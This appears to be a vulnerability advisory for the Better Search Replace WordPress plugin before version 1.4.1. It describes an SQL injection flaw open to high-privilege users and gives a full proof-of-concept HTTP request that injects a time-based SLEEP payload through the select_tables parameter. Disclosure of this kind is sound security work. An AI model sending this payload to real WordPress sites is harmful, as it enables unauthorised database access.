The plugin does not properly sanitise and escape table data before inserting it into a SQL query, which could allow high privilege users to perform SQL Injection attacks
POST /wp-admin/tools.php?page=better-search-replace&bsr-ajax;=process_search_replace HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 369 Connection: close Cookie:[admin+] bsr_ajax_nonce=3c38e50368&action;=process_search_replace&bsr;_step=0&bsr;_page=0&bsr;_data=search_for%3Daaa%26replace_with%3Dcef%26select_tables%255B%255D%3Dwp_posts%60%20WHERE%201=SLEEP(1)%20–%20%26dry_run%3Don%26bsr_nonce%3Da66e81c52b%26_wp_http_referer%3D%252Fwordpress%252Fwp-admin%252Ftools.php%253Fpage%253Dbetter-search-replace%26action%3Dbsr_process_search_replace
CPE | Name | Operator | Version |
---|---|---|---|
better-search-replace | lt | 1.4.1 |